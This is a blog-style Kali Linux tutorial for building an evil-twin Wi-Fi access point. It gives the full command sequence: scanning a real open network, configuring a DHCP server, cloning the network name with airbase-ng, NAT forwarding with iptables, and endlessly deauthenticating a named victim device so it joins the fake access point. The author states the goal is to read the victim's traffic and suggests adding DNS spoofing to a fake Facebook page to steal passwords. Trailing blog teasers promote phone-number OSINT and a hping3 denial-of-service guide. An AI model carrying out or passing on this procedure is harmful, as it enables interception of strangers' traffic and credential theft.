Skip to main content

Set Up an Eviltwin

Set Up an Eviltwin




When I tried to set up an eviltwin for a MitM-constelation in kali 2.0, I couldn't provide internet to the victim. The origin was the brctl bridging. I have read many tutorials but all of them where explained in backtrack and older versions of kali. So i was searching for a solution without using brctl and this solution will be explained now. This will just work on unencrypted wireless-environments.

Step 1 Sniff the Air

First victims AP information must be observerd
set wifi-adpater in monitor mode
there are two options to do so, I prefer this commands
"ifconfig wlan0 down"
"iwconfig wlan0 mode monitor"
"ifconfig wlan0 up"
this is the second one
"airmon-ng start wlan0"
if you have trouble with this type "airmon-ng check" and maybe kill some of the PIDS, but be aware not to kill your network connection.
airmon-ng will rename your wlan0 to wlan0mon so consider this in the following parts of the howto.
If monitor mode is enabled start checking the air for the APs sending their beacons.
 airodump-ng wlan0

The last command will provide you with useful information to set up the fake-AP.
  • BSSID of the real AP
  • channel of the real AP
  • encryption of the real AP
  • ESSID of the real AP
We pick the one with the ESSID wireless because this is an unencrypted AP. We can guess that this is a hotspot or a very careless user.
  • BSSID 64:7C:34:92:2B:41
  • Channel 2
  • no encryption
  • ESSID wireless
No we start a more specific airodump to get more overview
"airodump-ng --bssid 64:7C:34:92:2B:41 -c 2 wlan0"
we can see in the last line that there is already connected a device to this AP. The device has the MAC F8:01:13:4A:BA:D7
Let this terminal open and the airodump running.

Step 2 Set Up DHCP-Server

To provide our fake-AP with internet connection we have to set up an DHCP-server to configure the fake-AP with an IP-address and subnet.
prove if isc-dhcp-server is already installed
open a new Terminal
"dpkg -s isc-dhcp-server | grep Status"
if not
"apt-get install isc-dhcp-server"
No we have to configure the dhcpd.conf
"gedit /etc/dhcp/dhcpd.conf"
add this lines to the bottom
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0
{
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.2.255;
option domain-name-servers 8.8.8.8;
option routers 192.168.2.1;
range 192.168.2.20 192.168.2.60;
}
(please TAB the lines between the brackets)
the lease times set the time validity of the shared IP's.
subnet and the netmask set the net: 192.168.2.0 - 192.168.2.255 for our fake AP. the option domain-name-servers 8.8.8.8 set the DNS from google the rest of them are self explaining.
save the file

Step 3 Create the Eviltwin

no type in the second terminal
"airbase-ng -e wireless -c 2 wlan0"
here we have created the eviltwin-AP. I don't changed the BSSID, just the ESSID.
for completeness:
to change even the BSSID and not just the ESSID type
"airbase-ng -e wireless -a 64:7C:34:92:2B:41 -c 2 wlan0"
but for this attack is it not really necessary and just confuse while monitoring the results.
so here we started the eviltwin-AP and it has the BSSID C4:E9:84:0D:9C:FA
to monitor the connections we open a third terminal and type
"airodump-ng --bssid C4:E9:84:0D:9C:FA -c 2 wlan0"
Term1: monitors the real-AP
Term2: runs the fake-AP
Term3: monitors the fake-AP
 
Step 4 Provide Internet to the Eviltwin
airbase provide us with a new network-interface while it is running.
"ifconfig at0"
should show you some results now
so we bring it up
"ifconfig at0 up"
"ifconfig at0 192.168.2.1 netmask 255.255.255.0"
now start the dhcp-server
here the server will be started with the edited dhcpd.conf
"dhcpd -cf /etc/dhcp/dhcpd.conf "
to be sure the file is load correctly
"service isc-dhcp-server restart"
wrong ip-address in this picture, should be 192.168.2.1

Step 5Configure Your Firewall

last step before we go
just type this commands
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD -j ACCEPT --in-interface at0
echo 1 > /proc/sys/net/ipv4/ipforward
They will configure your firewall to route all traffic from at0 to eth0.
The last command say to your networkcard: "act like a router and forward all traffic to his destination"

Step 6Shoot Down the Connection

open a fourth terminal and send deauthenticate frames to the device which sticks on the real-AP.
"aireplay-ng --deauth 0 -a 64:7C:34:92:2B:41 -c F8:01:13:4A:BA:D7 wlan0"
--deauth 0 means that the frames will sending in an endless loop
(or till we have the connection we want to)
-a defines the BSSID of the AP
-c defines the MAC of the device we want to observe
we just shot down a specific device to avoid to much attention on network-flutter.
the result
 
no we can can listen to all traffic of the device.

Step 7Conclusion

These steps seems complicated for this kind of wifi-hack. When you write a script for dhcp-server starting and flushing it won't take more than 2 minutes to set up this attack. Theoretically you can write a script for the whole setup.
The profit of this attack should also be clear. When I heard of this attack my first question was: "When it's unencrypted anyway why should I conduct this attack and not just sitting in a good radius to the victim".
Benefit 1 is that this device now get provided the IP-address over our DHCP-server so we are in the same network...our network. (injection and so on).
Benefit 2 you can expand this attack to set up DNS-Spoofing. So the victim get redirect to a fake-Facebook site and we grab his password.

Comments

Popular posts from this blog

Find Identifying Information from a Phone Number Using OSINT Tools

Find Identifying Information from a Phone Number Using OSINT Tools Phone numbers often contain clues to the owner's identity and can bring up a lot of data during an OSINT investigation. Starting with a phone number, we can search through a large number of online databases with only a few clicks to discover information about a phone number. It can include the carrier, the owner's name and address, and even connected online accounts. While a phone number may not seem like much information to give out, an OSINT researcher can quickly discover information that ties a phone number to a variety of other clues. The data can be used to detect whether a phone number is a throwaway VoIP number used to hide the owner's identity or a cell phone belonging to a real person. In the event of buying something online or replying to an apartment ad,...

Difference Between POP3 and IMAP

Difference Between POP3 and IMAP POP3 and IMAP are the protocols that are used to retrieve mail from the mailbox at the mail server to the recipient’s computer. Both are message accessing agents (MAA). The two protocols POP3 and IMAP are used when both the sender and recipient of mail are connected to the mail server by WAN or LAN .  SMTP protocol transfers the mail from client’s computer to the mail server and from one mail server to another mail server.POP3 has a limited functionality whereas, the IMAP has extra features over POP3. The basic difference between POP3 and IMAP is that using POP3 ; the user has to download the email before checking its content whereas, the user can partially check the content of mail before downloading it, using IMAP . Let us check out some more differences between POP and IMAP with the help of comparison chart. Content: POP3 Vs IMAP Comparison Chart Definition Key Differences Conclusion Comparison Chart Basis for Comparison POP...

How to use hping3 in kali Linux(Performing dos attack)

How to use hping3 in kali Linux (Performing dos attack) What is hping3 hping3 is a network tool able to send custom TCP/IP packets and to dis‐ play target replies like ping program does with ICMP replies. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported protocols. Hping3 is extremely powerful you can do following things with hping3 Test firewall rules Advanced port scanning Test net performance using different protocols, packet size, TOS (type of service) and fragmentation. Path MTU discovery Transferring files between even really fascist firewall rules. Traceroute-like under different protocols. Firewalk-like usage. What is dos Attack Dos stands for denial of service. Dos attack shuts down Webservers/systems and completely makes them inaccessible to users. Dos attack floods target network with excess ...